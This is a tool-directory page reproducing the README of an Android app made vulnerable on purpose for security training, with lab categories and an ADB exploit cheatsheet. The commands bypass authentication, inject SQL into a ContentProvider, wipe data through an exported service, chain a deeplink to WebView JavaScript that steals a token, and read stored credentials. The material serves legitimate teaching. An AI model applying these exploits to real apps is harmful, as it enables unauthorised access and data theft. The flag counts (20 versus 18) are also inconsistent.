Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/b4sith-sec/gu3ssweak
Android SecurityVulnerability AnalysisMobile App PentestingWeb Application ExploitationCTFPenetration TestingMobile SecurityLearning & EducationLearning Paths & CoursesLabs & Practice
GitHubb4sith-sec/gu3ssweak

Gu3ssWeak

Deliberately vulnerable Android app for mobile security research and bug bounty practice - OWASP Mobile Top 10

View Repository
8249 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Gu3ssWeak

A deliberately vulnerable Android application for mobile security research, bug bounty practice, and CTF-style learning. Contains 21 documented vulnerabilities mapped to the OWASP Mobile Top 10.


Quick Start

git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk

Launch the app, work through each lab, capture flags, and submit them on the in-app CTF scoreboard.


Lab Categories

CategoryVulnerabilitiesFlags
WebViewWV-01 to WV-055
DeeplinkDL-01 to DL-04, DL-CHAIN5
Auth / SQL InjectionSQL-011
Admin PanelAP-01 to AP-042
ContentProviderCP-011
Broadcast ReceiverBR-01 to BR-032
ServiceSV-01, SV-02a, SV-02b2
Network InterceptionNET-011
Banking / OTPOTP-011
LFILFI-011
StorageSTORE-011
XSSXSS-01, XSS-022

20 flags total, plus a master flag awarded for capturing all of them.


Screenshots

Lab ListCTF Scoreboard
lab

CTF Flow

  1. Open the app - lands directly on the lab list.
  2. Pick a lab, exploit the vulnerability (via UI, ADB, or both).
  3. Each successful exploit auto-captures its flag.
  4. Tap "Submit Flag" to confirm, or check progress on "CTF Scoreboard".
  5. Capture all 18 flags to unlock the master flag.

Documentation

  • ARCHITECTURE.md - How each vulnerable component works internally
  • MITIGATIONS.md - Fix and remediation guidance for every vulnerability, including LFI-to-RCE escalation concepts
  • SECURITY.md - Security policy and responsible disclosure
  • CHECKSUMS.txt - SHA256 checksums for built APKs

ADB Exploit Cheatsheet

# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity

Admin panel - bypass the "fixed" auth check via forged intent extra

adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true

ContentProvider grant bypass - parenthesis breakout escapes the single-row grant

adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""

# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker

# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data

# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"

# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml

# Watch for logged secrets
adb logcat | grep Gu3ssWeak

Disclaimer

This project is purely educational. All vulnerabilities are intentional and documented. Techniques shown here apply to real apps, but only test systems you own or are authorized to test. See SECURITY.md for the full disclaimer and responsible disclosure guidance.

License

MIT - see LICENSE.

Download Tool